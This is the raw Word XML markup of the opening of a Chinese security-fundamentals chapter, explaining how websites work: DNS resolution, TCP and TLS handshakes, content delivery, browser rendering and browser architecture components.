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DD0BC" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00A00E83">
      <w:pPr>
        <w:keepNext/>
        <w:keepLines/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:beforeLines="200" w:before="652" w:afterLines="100" w:after="326" w:line="480" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0"/>
        <w:jc w:val="center"/>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="SimHei"/>
          <w:bCs/>
          <w:kern w:val="44"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="44"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:eastAsia="SimHei" w:hint="eastAsia"/>
          <w:bCs/>
          <w:kern w:val="44"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t>安全基础</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E9D86B3" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00A00E83">
      <w:pPr>
        <w:keepNext/>
        <w:keepLines/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="260" w:after="260" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0"/>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:rFonts w:eastAsia="SimHei" w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:sz w:val="30"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:eastAsia="SimHei" w:cstheme="majorBidi" w:hint="eastAsia"/>
          <w:bCs/>
          <w:sz w:val="30"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>网站工作原理</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C456907" w14:textId="5BDA7C74" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00A00E83">
      <w:pPr>
        <w:keepNext/>
        <w:keepLines/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="260" w:after="260" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="SimHei" w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:eastAsia="SimHei" w:cstheme="majorBidi" w:hint="eastAsia"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>网站访问完整过程</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DDB0FE0" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00A00E83">
      <w:pPr>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:before="120" w:after="120" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="21"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="28B171AD" wp14:editId="3A62AF6C">
            <wp:extent cx="5615940" cy="3126105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F885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1</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>DNS</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>解析：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ED6A86A" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00854AE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>浏览器缓存</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>→</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>系统</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">hosts </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>→</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>本地</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">DNS </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>→</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>根</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">DNS </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>→</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>顶级域</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>DNS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C07906C" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00854AE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>dig +trace www.example.com</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查看完整过程</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="293C55A1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b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>TCP</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>连接：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AADC587" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00854AE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>三次握手：</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">SYN </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>→</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> SYN-ACK </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>→</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> ACK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="477F7CD2" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00854AE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>HTTPS</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>增加</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>TLS</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>握手（</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">ClientHello </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>→</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> ServerHello </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>→</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>密钥交换）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00E467A6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3</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>内容获取：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5568F93C" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00854AE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>静态资源：直接由</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Web</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>服务器</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(Nginx/Apache)</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>返回</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="372E59E6" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00854AE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>动态内容：通过</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>PHP/Python</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>等应用服务器生成</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="083BAF77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4</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>浏览器渲染：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74C712B6" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00854AE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>解析</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>HTML</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>构建</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>DOM</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>树</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1425CFF3" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00854AE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>解析</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CSS</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>构建</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CSSOM</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>树</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09A74C43" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00854AE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>合并成渲染树</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>→</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>布局</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>→</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>绘制</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7225558B" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00A00E83">
      <w:pPr>
        <w:keepNext/>
        <w:keepLines/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="260" w:after="260" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="SimHei" w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:eastAsia="SimHei" w:cstheme="majorBidi" w:hint="eastAsia"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>浏览器核心工作原理</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D4F9FF9" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00A00E83">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Hlk199702895"/>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>浏览器架构组件</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12B8CB48" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00A00E83">
      <w:pPr>
        <w:keepNext/>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>表</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/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 w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:instrText>STYLEREF 1 \s</w:instrText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/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi"/>
          <w:noProof/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>9</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/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 w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:instrText xml:space="preserve">SEQ </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:instrText>表</w:instrText>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> \* ARABIC \s 1</w:instrText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/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi"/>
          <w:noProof/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi" w:hint="eastAsia"/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>浏览器架构组件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452"/>
        <w:gridCol w:w="6392"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A00E83" w:rsidRPr="00A00E83" w14:paraId="797B0206" w14:textId="77777777" w:rsidTr="00501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65B48FE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组件</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="361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70C2F30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功能</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A00E83" w:rsidRPr="00A00E83" w14:paraId="52620E7D" w14:textId="77777777" w:rsidTr="00501C99">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1386" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="7F09AC38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rFonts w:cs="Times New Roman"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="24"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A00E83">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman" w:hint="eastAsia"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="24"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>用户界面</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3614" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="3120CCEB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rFonts w:cs="Times New Roman"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地址栏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/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书签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/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后退按钮等交互元素</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A00E83" w:rsidRPr="00A00E83" w14:paraId="28B3DA86" w14:textId="77777777" w:rsidTr="00501C99">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1386" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="16D2B751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rFonts w:cs="Times New Roman"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浏览器引擎</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3614" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="2CCF531A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rFonts w:cs="Times New Roman"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协调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UI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与渲染引擎工作</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A00E83" w:rsidRPr="00A00E83" w14:paraId="61F79331" w14:textId="77777777" w:rsidTr="00501C99">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1386" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="16D30480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渲染引擎</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3614" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="3860505B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解析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HTML/CSS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并显示内容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(Blink/WebKit)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A00E83" w:rsidRPr="00A00E83" w14:paraId="24B2FD34" w14:textId="77777777" w:rsidTr="00501C99">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1386" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="71D69A5C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JS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解释器</w:t>
            </w:r>
          </w:p>
        </w:tc>
